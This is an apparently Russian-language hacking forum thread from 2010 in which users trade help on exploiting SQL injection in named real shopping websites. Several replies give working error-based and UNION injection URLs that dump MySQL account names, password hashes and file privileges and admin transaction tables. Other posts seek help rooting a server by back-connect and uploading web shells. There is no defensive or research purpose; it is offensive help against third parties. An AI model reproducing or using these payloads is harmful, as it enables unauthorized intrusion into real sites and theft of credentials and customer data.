Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. [Ozzi]

    [Ozzi] New Member

    Joined:
    26 Nov 2010
    Messages:
    16
    Likes Received:
    0
    Reputations:
    -1
    А как мне узнать в той ли базе таблица?
     
  2. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    table_schema
     
  3. [Ozzi]

    [Ozzi] New Member

    Joined:
    26 Nov 2010
    Messages:
    16
    Likes Received:
    0
    Reputations:
    -1

    А пример с использованием можно?)
     
  4. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    select table_schema from information_schema.tables where table_name='идем_читать_маны_по_скулям'
     
    _________________________
    1 person likes this.
  5. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    http://www.totalbhakti.com/shop.php?cid=2'
    Помогите расскурутить чучуть) а то не получается \ =
     
  6. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    GroM88
    http://www.totalbhakti.com/shop.php?cid=2+or+1+group+by+concat(version(),floor(rand(0)*2))having+min(0)+or+1--
    error based

    mysql юзверы (дада,майскул доступен на чтение)
    http://www.totalbhakti.com/shop.php?cid=2+and(select+1+from(select+count(*),concat((select+(select+(SELECT+concat_ws(0x3a,user,password,file_priv)+from+mysql.user+limit+0,1) )+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from information_schema.tables+group+by+x)a)+and+1=1
     
    #15526 ~d0s~, 7 Dec 2010
    Last edited: 7 Dec 2010
    4 people like this.
  7. GroM88

    GroM88 Elder - Старейшина

    Joined:
    24 Oct 2007
    Messages:
    464
    Likes Received:
    62
    Reputations:
    26
    Глупый вопрос) но все же)
    Какие запросы использовать в скуле что бы просматривать таблицы из определенной БД?
    ну т.е. information_schema.tables выводит все таблицы из всех бд)
    а мне надо посмотреть таблицы из определенной бд)
     
  8. [Ozzi]

    [Ozzi] New Member

    Joined:
    26 Nov 2010
    Messages:
    16
    Likes Received:
    0
    Reputations:
    -1
    Помогите раскрутить)

    http://www.grieger-boote.de/product_info.php?products_id=3934'
     
  9. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    http://www.grieger-boote.de/product_info.php?products_id=3934' or 1 group by concat((select version()),floor(rand(0)*2)) having min(0) or 1 -- 1
     
  10. [Ozzi]

    [Ozzi] New Member

    Joined:
    26 Nov 2010
    Messages:
    16
    Likes Received:
    0
    Reputations:
    -1

    Спасибо но тогда вопрос почему здесь не катит так же ?

    http://www.drachenshop.de/product_info.php?products_id=555'
     
  11. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    имеется один сервак с старым ядром, хочу порутать.. делаю бек-коннект, коннект доходит но сразу же отрубает меня.. пробовал биндить порты (53, 81, 31337) - то же самое. есть идеи? :)
     
  12. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    попробуй другие порты, мне повезло с этими. 8000, 31336


    select table_name from information_schema.tables where table_schema='перечитай_маны_по_скулям'
     
    _________________________
    1 person likes this.
  13. [Ozzi]

    [Ozzi] New Member

    Joined:
    26 Nov 2010
    Messages:
    16
    Likes Received:
    0
    Reputations:
    -1
    http://www.webmallindia.com/gifts/productlist.php?catid=-203%20+union+select+1,2,3,4,column_name,6,7,8%20from%20information_schema.columns%20where%20table_name=0x5472616e73616374%20limit%2011,1

    Возможно ли вывести любое поле из этой таблицы ?
     
  14. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    можно!

    Code:
    http://www.webmallindia.com/gifts/productlist.php?catid=-203+union+select+unhex%28hex%28group_concat%28id,0x3a,action,0x3a,adminid,0x3a,tablename,0x3a,record_id,0x3a,actiontime%29%29%29+from+admin_transaction%20--+
    ;)

    Code:
    http://www.webmallindia.com/gifts/productlist.php?catid=-203+union+select+unhex%28hex%28group_concat%28cd_id,0x3a,cd_name,0x3a,cd_catid,0x3a,cd_gen,0x3a,cd_lan,0x3a,cd_make,0x3a,cd_typ,0x3a,cd_flag,0x3a,cd_img,0x3a,cd_desc,0x3a,cd_inline_desc,0x3a,cd_price,0x3a,cd_discount,0x3a,cd_vendor,0x3a,cd_approve%29%29%29+from+cd
     
    #15534 547, 8 Dec 2010
    Last edited: 8 Dec 2010
    1 person likes this.
  15. MastaBass1

    MastaBass1 Member

    Joined:
    25 Dec 2009
    Messages:
    61
    Likes Received:
    13
    Reputations:
    2
    Подскажите как залить шелл, в CMS Santafox, стоят фильтры на все!
    Пытаюсь через добавление картинок/видео, выкидывает ошибку, пробовал разными методами, нефига, все перепробовал.
    Помогите может кто работал с этой КМСкой, или знает иные способы заливки шелла?
     
  16. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    Тут нет скули.
     
  17. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    такс давайте выносим какие нить изменения!, с этого дня здесь не постим скули вида id=1'
    я все равно их буду удалять.
    здесь помогают раскрутить багу, если есть какие нить не понятные моменты, пишите, "вот делаю запрос не получается" или "подобрал калонки, вывода нет" или хз что там

    но не пишите, помогите раскрутить ид=1' =\
    вам это не онлайн инжектор.
     
    _________________________
    #15537 Konqi, 9 Dec 2010
    Last edited by a moderator: 9 Dec 2010
    2 people like this.
  18. Sl1ng3R

    Sl1ng3R New Member

    Joined:
    23 Nov 2009
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Всем привет :)
    Не так давно решил заняться sql инжектами. много читал, много думал... не в этом суть :) Проблем с нахождением и раскручиванием нету... Проблема в другом - в 90% случаев от баз толку ноль, ничего хорошего в них не находится :( Соответственно сайтик остается без шелла :) Не порядок ) Посоветуйте - как бы все же средствами скуля залить на этот сайт что нибудь...
     
  19. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274

    у некоторых от начало заниматся скулями до заливки шеллов и превращения их в ликвид уходят годы...способоб заливки тысячи и зависит от КМС, админки, состояние сервера и тд и тп..тебе тут целый мануал выложить что ли?

    ЗЫ. Забыл сказать вам начинающим скулерам, сайты которые вы хекаете..давно уже перехеканы до вас...так что заливка шелла вам многого не даст...ну конечно за рeдким исключением .
     
    #15539 Gorev, 9 Dec 2010
    Last edited: 9 Dec 2010
    1 person likes this.
  20. Sl1ng3R

    Sl1ng3R New Member

    Joined:
    23 Nov 2009
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    Я и не спорю что новичек :) И прекрасно знаю что я знаю и умею пока дай бог процентов 10%... Просто большинство пользуется стандартной схемой - инж -> поиск базы с пассом -> заливка/поиск как залить шелл из админки. С этим все понятно.
    Меня интересует что делать если в базе ничего хорошего не обнаружено, админки вообще нету... Т.е. доступ есть только к скулю...
    P.S. Писать подробный мануал я и не прошу - прошу пнуть в нужную сторону :)
     
Thread Status:
Not open for further replies.